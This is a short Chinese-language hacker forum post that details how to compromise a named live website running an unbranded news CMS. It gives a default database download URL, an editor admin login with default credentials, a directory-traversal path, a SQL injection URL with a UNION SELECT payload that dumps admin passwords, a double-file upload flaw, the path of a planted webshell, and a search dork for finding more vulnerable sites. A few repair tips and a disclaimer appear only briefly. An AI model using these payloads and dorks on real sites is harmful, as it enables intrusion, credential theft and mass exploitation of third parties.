今天在測試滲透一網站時,旁註發現這套程序。版權未知。
問題很多,發出來大家瞭解下。
請勿非法入侵他人網站/系統,否則後果自負!
默認網站數據庫:
http://www.08.tv/data/nxnews.mdb (做爲一個合格的站長,這個不用說怎麼做了吧?)
ewebeditor 在線編輯器:
http://www.08.tv/ewebeditor/admin_login.asp
帳戶/密碼:admin admin
登陸後可遍歷目錄:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
Sql注入漏洞:
http://www.08.tv/detail.asp?id=12
exp:
union select 1,admin,password,4,5,6,7,8 from admin
爆出明文帳號/密碼
上傳漏洞:
http://www.08.tv/manage/upfile.asp 傳說中的雙文件上傳。當然,你也可以用工具。如明小子。
webshell: http://www.08.tv/manage/tupian/201108102214.asp
簡單修復:修改默認數據庫、後臺路徑/刪除ewebedtior目錄下admin_login.asp/增加防注入系統/對upfile.asp作驗證
google:inurl:news.asp?lanmuName=
京華志: 這樣的漏洞 一般是屬於最初級的了 但是往往有很多站長不注意 所以還能拿下很多站的 如果想更快 更精準的獲取更多BUG 0DAY
漏洞信息 請關注京華志 www.jinghuazhi.com
本文來源於:凱里黑客http://www.0855.tv ,轉載請註明來處,謝謝!